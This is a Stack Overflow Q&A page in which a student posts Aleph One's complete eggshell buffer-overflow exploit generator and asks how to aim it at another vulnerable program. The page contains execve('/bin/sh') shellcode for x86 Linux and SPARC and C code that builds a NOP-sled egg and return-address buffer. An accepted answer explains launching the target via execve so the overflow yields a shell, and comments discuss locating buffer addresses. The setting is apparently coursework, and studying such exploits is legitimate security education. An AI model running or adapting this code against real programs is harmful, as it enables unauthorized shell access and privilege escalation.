current community

your communities

more stack exchange communities

company blog
Stack Exchange Inbox Reputation and Badges
tour help
Join the Stack Overflow Community
Stack Overflow is a community of 6.4 million programmers, just like you, helping each other.
Join them; it only takes a minute:
Sign up
up vote -2 down vote favorite
1

I got this code of aleph one:

shellcode.h

#if defined(__i386__) && defined(__linux__)

#define NOP_SIZE    1
char nop[] = "\x90";
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)

#define NOP_SIZE    4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
  "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
  "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
  "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
  "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";

unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

#elif defined(__sparc__) && defined(__sun__)

#define NOP_SIZE        4
char nop[]="\xac\x15\xa1\x6e";
char shellcode[] =
  "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
  "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
  "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
  "\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";

unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

#endif

eggshell.c

/*
 * eggshell v1.0
 *
 * Aleph One / [email protected]
 */
#include <stdlib.h>
#include <stdio.h>
#include "shellcode.h"

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048

void usage(void);

void main(int argc, char *argv[]) {
  char *ptr, *bof, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE;

  while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF)
    switch (c) {
      case 'a':
        align = atoi(optarg);
        break;
      case 'b':
        bsize = atoi(optarg);
        break;
      case 'e':
        eggsize = atoi(optarg);
        break;
      case 'o':
        offset = atoi(optarg);
        break;
      case '?':
        usage();
        exit(0);
    }

  if (strlen(shellcode) > eggsize) {
    printf("Shellcode is larger the the egg.\n");
    exit(0);
  }

  if (!(bof = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAligment:\t%d\t]\n",
    bsize, eggsize, align);
  printf("[ Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset);

  addr_ptr = (long *) bof;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE)
    for (n = 0; n < NOP_SIZE; n++) {
      m = (n + align) % NOP_SIZE;
      *(ptr++) = nop[m];
    }

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  bof[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);

  memcpy(bof,"BOF=",4);
  putenv(bof);
  system("/bin/sh");
}

void usage(void) {
  (void)fprintf(stderr,
    "usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offset>]\n");
}

I'm trying to use this exploit on another vulnerable program and I understood that I need to activate the other vulnerable program through the aleph one program. could somebody please tell me how to do that?

share|improve this question

closed as too broad by Martin James, Sami Kuhmonen, Thomas Padron-McCarthy, Bo Persson, David Hoelzer Dec 9 '15 at 16:17

There are either too many possible answers, or good answers would be too long for this format. Please add details to narrow the answer set or to isolate an issue that can be answered in a few paragraphs.If this question can be reworded to fit the rules in the help center, please edit the question.
1  
Please don't ask about help with malware development here as a refusal, and down/close vote, often offends. – Martin James Dec 9 '15 at 10:00
    
@MartinJames, there are so many questions about malware last time. Any ideas why? – kelin Dec 9 '15 at 10:21
    
why wont ask?? im doing this for research not for anything that will cause damage to someone...the valunarble program is a program from my studies... – Elad Doocker Dec 9 '15 at 10:45
    
There are, but please understand that it's not a personal issue:) Whenever I see 'buffer overflow', 'exploit', 'vulnerability' etc. I just auto down and close vote. If it has a whiff of malware, I always respond in that manner. ' im doing this for research' - I'm sure you understand that malware developers lie. I'm not saying that you are, but you may be. – Martin James Dec 9 '15 at 10:55
    
All those "shell code" exploits only work on specific environments and with specific compilers. – Michael Walz Dec 9 '15 at 11:06
up vote 0 down vote accepted

Question is not about malware development, it is content of security class at many universities !

The target program must accept input if you want to run this buffer overflow on it. You start target program with execve system call which's arguments are location of program and arguments array.

You get address with get_sp() from shellcode.h, you get shellcode from shellcode.h and you fill your buffer (which will overflow) inside eggshell.c. Then you start target program with execve() giving buffer as argument and overflow will occur, which will open you shell.

Sample exploit example can be found here and its target is here. It does not use get_sp, addresses are harcoded there.

share|improve this answer
    
thank you for your help!!! can you please tell me if there is any way to find the buffer address without using gdb?? because the program i need to buffer overflow wasent compiled with gdb flag... – Elad Doocker Dec 10 '15 at 16:03
    
i have got it with gdb, i dont know other ways – Jemshit Iskenderov Dec 10 '15 at 16:05
    
ok thanks and another question...do you know what is the use of align as a parameter for aleph one eggshell.c code?? – Elad Doocker Dec 12 '15 at 1:08
    
İ think it just fills egg with nop[], from starting from end of nop[] to beginning or vice versa. That nop[] with size 4 is for sparc system, not for linux. On linux NOP instruction =x90 – Jemshit Iskenderov Dec 12 '15 at 9:24
    
yea i know but his function get the align as one of the parameters but how can i know how much NOPs i need?? – Elad Doocker Dec 12 '15 at 10:00

Not the answer you're looking for? Browse other questions tagged or ask your own question.